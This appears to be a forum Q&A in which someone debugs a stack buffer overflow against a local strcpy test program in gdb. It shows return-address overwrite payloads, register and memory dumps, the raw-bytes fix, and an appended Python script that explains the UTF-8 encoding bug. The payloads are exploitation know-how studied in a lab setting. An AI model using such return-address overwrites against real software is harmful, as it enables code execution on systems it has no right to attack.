I am running a test in gdb to exploit a buffer overflow, testing with:
(gdb) r $(python3 -c 'print("\x41"*152+"\x42"*6)')
(gdb) i r
...
rbp 0x4141414141414141 0x4141414141414141
rsp 0x7fffffffe420 0x7fffffffe420
rip 0x424242424242 0x424242424242
...
I get BBBBBB, but when testing with an address:
r $(python3 -c 'print("\x41"*152+"\x70\xe3\xff\xff\xff\x7f")')
(gdb) i r
...
rbp 0x4141414141414141 0x4141414141414141
rsp 0x7fffffffe3f8 0x7fffffffe3f8
rip 0x400694 0x400694 <main+171>
...
I get 0x400694 0x400694
I have tried different addresses and formats, but I get the same answer.
UPDATE: here are some additional details:
for the test1 with: r $(python3 -c 'print("\x41"*152+"\x42"*6 )')
Vulnerable call @ 0x0000000000400667 <+126>: callq 0x400460 strcpy@plt
Dump of assembler code for function main:
0x0000000000400667 <+126>: callq 0x400460 strcpy@plt
0x000000000040066c <+131>: lea -0x90(%rbp),%rdx
0x0000000000400673 <+138>: lea -0x90(%rbp),%rax
0x000000000040067a <+145>: mov %rax,%rsi
0x000000000040067d <+148>: lea 0x134(%rip),%rdi # 0x4007b8
0x0000000000400684 <+155>: mov $0x0,%eax
0x0000000000400689 <+160>: callq 0x400480 printf@plt
0x000000000040068e <+165>: mov $0x0,%eax
0x0000000000400693 <+170>: leaveq
0x0000000000400694 <+171>: retq
The break is @ 0x0000000000400694 <+171>: retq, which I follow with 'next'
(gdb) next
(gdb) x/256xb $rsp-192
0x7fffffffe370: 0x02 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fffffffe378: 0x8e 0x06 0x40 0x00 0x00 0x00 0x00 0x00
0x7fffffffe380: 0x08 0xe5 0xff 0xff 0xff 0x7f 0x00 0x00
0x7fffffffe388: 0x00 0x00 0x00 0x00 0x02 0x00 0x00 0x00
0x7fffffffe390: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fffffffe398: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fffffffe3a0: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fffffffe3a8: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fffffffe3b0: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fffffffe3b8: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fffffffe3c0: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fffffffe3c8: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fffffffe3d0: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fffffffe3d8: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fffffffe3e0: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fffffffe3e8: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fffffffe3f0: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fffffffe3f8: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fffffffe400: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fffffffe408: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fffffffe410: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fffffffe418: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fffffffe420: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fffffffe428: 0x42 0x42 0x42 0x42 0x42 0x42 0x00 0x00
0x7fffffffe430: 0x02 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fffffffe438: 0x08 0xe5 0xff 0xff 0xff 0x7f 0x00 0x00
0x7fffffffe440: 0x00 0x80 0x00 0x00 0x02 0x00 0x00 0x00
0x7fffffffe448: 0xe9 0x05 0x40 0x00 0x00 0x00 0x00 0x00
0x7fffffffe450: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fffffffe458: 0x8e 0x14 0xd9 0x63 0x32 0x13 0xbd 0x9e
0x7fffffffe460: 0x90 0x04 0x40 0x00 0x00 0x00 0x00 0x00
0x7fffffffe468: 0x00 0xe5 0xff 0xff 0xff 0x7f 0x00 0x00
(gdb) i r
rax 0x0 0
rbx 0x0 0
rcx 0x0 0
rdx 0x0 0
rsi 0x602260 6300256
rdi 0x1 1
rbp 0x4141414141414141 0x4141414141414141
rsp 0x7fffffffe430 0x7fffffffe430
r8 0x0 0
r9 0x0 0
r10 0x0 0
r11 0x246 582
r12 0x400490 4195472
r13 0x7fffffffe500 140737488348416
r14 0x0 0
r15 0x0 0
rip 0x424242424242 0x424242424242
eflags 0x206 [ PF IF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
for the test2 with: r $(python3 -c 'print("\x41"*152+"\x70\xe3\xff\xff\xff\x7f")')
The break is still @ 0x0000000000400694 <+171>: retq, which I follow with 'next'
(gdb) next
(gdb) x/256xb $rsp-192
0x7fffffffe370: 0x02 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fffffffe378: 0x8e 0x06 0x40 0x00 0x00 0x00 0x00 0x00
0x7fffffffe380: 0x08 0xe5 0xff 0xff 0xff 0x7f 0x00 0x00
0x7fffffffe388: 0x00 0x00 0x00 0x00 0x02 0x00 0x00 0x00
0x7fffffffe390: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fffffffe398: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fffffffe3a0: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fffffffe3a8: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fffffffe3b0: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fffffffe3b8: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fffffffe3c0: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fffffffe3c8: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fffffffe3d0: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fffffffe3d8: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fffffffe3e0: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fffffffe3e8: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fffffffe3f0: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fffffffe3f8: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fffffffe400: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fffffffe408: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fffffffe410: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fffffffe418: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fffffffe420: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7fffffffe428: 0x70 0xc3 0xa3 0xc3 0xbf 0xc3 0xbf 0xc3
0x7fffffffe430: 0xbf 0x7f 0x00 0x00 0x00 0x00 0x00 0x00
0x7fffffffe438: 0x08 0xe5 0xff 0xff 0xff 0x7f 0x00 0x00
0x7fffffffe440: 0x00 0x80 0x00 0x00 0x02 0x00 0x00 0x00
0x7fffffffe448: 0xe9 0x05 0x40 0x00 0x00 0x00 0x00 0x00
0x7fffffffe450: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fffffffe458: 0xb0 0x0b 0xe6 0x1e 0x6c 0x33 0x69 0x0a
0x7fffffffe460: 0x90 0x04 0x40 0x00 0x00 0x00 0x00 0x00
(gdb) i r
rax 0x0 0
rbx 0x0 0
rcx 0x0 0
rdx 0x0 0
rsi 0x602260 6300256
rdi 0x1 1
rbp 0x4141414141414141 0x4141414141414141
rsp 0x7fffffffe428 0x7fffffffe428
r8 0x0 0
r9 0x0 0
r10 0x0 0
r11 0x246 582
r12 0x400490 4195472
r13 0x7fffffffe500 140737488348416
r14 0x0 0
r15 0x0 0
rip 0x400694 0x400694 <main+171>
eflags 0x10206 [ PF IF RF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
Finally, thanks to @Jester: the encoding was the problem.
(gdb) r $(python3 -c 'import sys; sys.stdout.buffer.write(b"\x41"*152 + b"\x70\xe3\xff\xff\xff\x7f")')
This solved the problem.
Same steps as above:
Program received signal SIGSEGV, Segmentation fault.
0x00007fffffffe370 in ?? ()
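Added example, not from the original post or from @Jester: a small Python script that reproduces the encoding difference behind the two results above, so the payload bytes can be checked before anything is run under gdb. It assumes a UTF-8 locale (which the 0xc3 0xa3 / 0xc3 0xbf pairs at 0x7fffffffe428 in the second dump indicate); the function names and the `check_return_slot` helper are mine. The 152-byte filler and the 6-byte address are the values from the post.

```python
import sys

# Constructed values mirroring the post: 152 filler bytes followed by the
# 6-byte little-endian address written over the saved return address.
FILLER_LEN = 152
ADDR_BYTES = b"\x70\xe3\xff\xff\xff\x7f"
ADDR_TEXT = "\x70\xe3\xff\xff\xff\x7f"   # same escapes, but as a str


def payload_via_str_print(encoding: str = "utf-8") -> bytes:
    """Bytes that reach argv when a str is handed to print().

    print() writes text, so each code point is run through the locale
    codec (assumed UTF-8 here). Code points >= 0x80 become two bytes
    each, so the address is silently expanded from 6 bytes to 10.
    The trailing newline print() adds is dropped by the shell's $(...)
    substitution, so it is not modelled.
    """
    text = "\x41" * FILLER_LEN + ADDR_TEXT
    return text.encode(encoding)


def payload_via_buffer_write() -> bytes:
    """Bytes that reach argv with sys.stdout.buffer.write(bytes):
    exactly what was written, byte for byte (the fix the post ends with)."""
    return b"\x41" * FILLER_LEN + ADDR_BYTES


def check_return_slot(raw: bytes, expected: bytes, offset: int) -> dict:
    """Compare the bytes at the return-address slot with the intended value.

    Also flags NUL bytes: argv entries are C strings, so anything after the
    first 0x00 never reaches the program.
    """
    slot = raw[offset:offset + len(expected)]
    return {
        "total_len": len(raw),
        "slot": slot,
        "intact": slot == expected,
        "has_nul": b"\x00" in raw,
    }


def emit(data: bytes) -> None:
    """Write raw bytes to stdout, bypassing the text-layer codec."""
    sys.stdout.buffer.write(data)


if __name__ == "__main__":
    for name, data in (("print(str)", payload_via_str_print()),
                       ("buffer.write(bytes)", payload_via_buffer_write())):
        r = check_return_slot(data, ADDR_BYTES, FILLER_LEN)
        print(f"{name:20} len={r['total_len']:3} "
              f"slot={r['slot'].hex()} intact={r['intact']}")
```

Run as a script, the first line shows the slot starting `70c3a3c3bfc3` (the 10-byte UTF-8 expansion the second dump in the post contains) and the second shows `70e3ffffff7f`. The same `str` encoded as latin-1 produces the 6 intended bytes, which is why this bug depends on the locale rather than on the escapes themselves; writing `bytes` through `sys.stdout.buffer` removes that dependency.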